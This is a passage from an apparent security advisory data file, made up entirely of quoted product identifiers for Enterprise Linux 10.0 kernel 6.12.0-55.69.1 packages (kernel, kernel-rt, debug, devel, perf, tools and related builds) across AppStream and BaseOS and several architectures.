"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
